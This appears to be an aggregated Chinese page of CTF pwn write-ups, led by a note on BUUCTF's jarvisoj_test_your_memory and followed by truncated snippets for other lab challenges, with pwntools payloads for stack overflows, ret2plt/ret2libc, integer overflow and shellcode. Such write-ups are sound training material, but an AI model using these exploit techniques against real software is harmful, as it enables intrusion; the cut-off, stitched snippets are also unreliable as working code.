[BUUCTF]PWN——jarvisoj_test_your_memory

需要正常结束程序（执行cat flag后hint中才有内容），所以调用system之后再调用main打印hint，即flag。没有/bin/sh，但是存在cat flag，同样可以用作system的参数。有system，无/bin/sh，但有cat flag。存在栈溢出，可以进行溢出调用system。

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

[BUUCTF-pwn]——jarvisoj_test_your_memory 直接通过提示栈溢出 exploit from pwn import* p=remote('node3.buuoj.cn',"29320") context.log_level = 'debug' payload='a' * (0x13 + 4)+p32(0x8048440)+p32(0x8048677)+p32(0x80487E0) #system main cat flag p.

存在溢出漏洞： 进行了逻辑判断，相等则输出good job！！！ 从堆栈上看，s2在return地址下面。 整合上面，便于脚本如下： from pwn import* p = process('./memory') system_addr = 0x08048440 catflag_addr = 0x080487E0 payload='A'*0x17 + p32(system_addr...

简单的ret2plt 检查下防护，只开了NX。 放ida里： 问题出在mem_test函数里： 点开hint，发现了有"cat flag"这个字符串： 而且还在rodata区里，那直接硬编码就可以了。 程序本身调用了system函数，那直接ret2plt就行了。 根据ida计算出溢出点： 溢出点0x13+4。 编写exp： from pwn import* a=remote("p...

题目 Wp 基本项检查，32位，开了NX，got表可写 这里看到alphanum_2626和mem_test 跟进mem_test，可以看到是scanf 这里可以看到偏移，直接上payload 这里一定要有返回地址，不然程序奔溃之后看不到flag from pwn import * sh = remote("pwn2.jarvisoj.com",9876) e=ELF('./TestYourMemory') sys_addr=e.symbols['system'] cat_flag_addr=e

运行可以看到泄露了cat flag的data的位置，在程序里可以看到system， 栈溢出就行了 exp： from pwn import * from LibcSearcher import * local_file = './memory' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2...

[第五空间2019 决赛]PWN5 例行检查，32位，开启了canary保护和NX保护。 运行一下。 IDA打开，看到了/bin/sh,但开启了保护 查看主函数，函数的功能是读入一个4位的随机密码，再将我们输入的密码与随机生成数比较，相同就执行system 这里面的printf（）存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的，是由前面的格式化字符串决定的，所以我们只要控制了前面的格式化字符串，再结合一些参数，后面输出什么就是由我们决定的；如： %d 用于读取10进制数值 %x

jarvisoj_level2_x64 例行检查 ，64位，开启NX保护， 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数，buf的长度为0x80,读取的长度为0x200，可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',

jarvisoj_level3 32位，NX保护。 运行程序。 用IDA打开，shift+f12检索 ，找到关键函数。 参数buf溢出漏洞，利用ret2libc获取shell。 1，利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('

bjdctf_2020_babystack2 64位，开启NX保护。 运行一下。 用IDA打开。找到了后门函数。backdoor=0x400726 查看main函数 读入数据的大小由我们输入的参数nbytes控制 nbytes参数的类型 是 size_t，它是一个无符号整型。 但是第7行又将它转换成了有符号的整型，存在整数溢出漏洞（即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围，从而造成溢出，常用-1来造成溢出） from pwn import * r=remote('nod

jarvisoj_tell_me_something 例行检查，开启NX保护，64bit 运行一下 用IDA打开，看到了关键函数 flag.txt.跟进一下。 flag_addr=0x400620 看一下主函数。 输入点的v4溢出漏洞，利用它覆盖返回地址为flag_addr的地址读出flag。 汇编结尾没有leave 起步刚开始就直接是rsp减去0x88，这里是没有把rbp压入栈，所以只需要0x88的数据大小，就可以覆盖返回地址了 from pwn import * r=remote('nod

picoctf_2018_buffer overflow 2 例行检查，32位，开启NX保护 运行一下， 用IDA打开。看到了flag.txt，跟进一下。 win函数地址为0x80485cb a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时，输出flag. from pwn import* r=remote('node3.buuoj.cn',26224) payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0x

ciscn_2019_s_9 参考 例行检查 ，32位，未开启任何保护 运行一下。 32位ida载入，，第10行的fgets，能够溢出0x32-0x20-0x4个字节 没用nx保护，首先想到的就是往s里写入shellcode，然后跳转到s执行shellcode 生成的shellcode的长度过长，参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈，标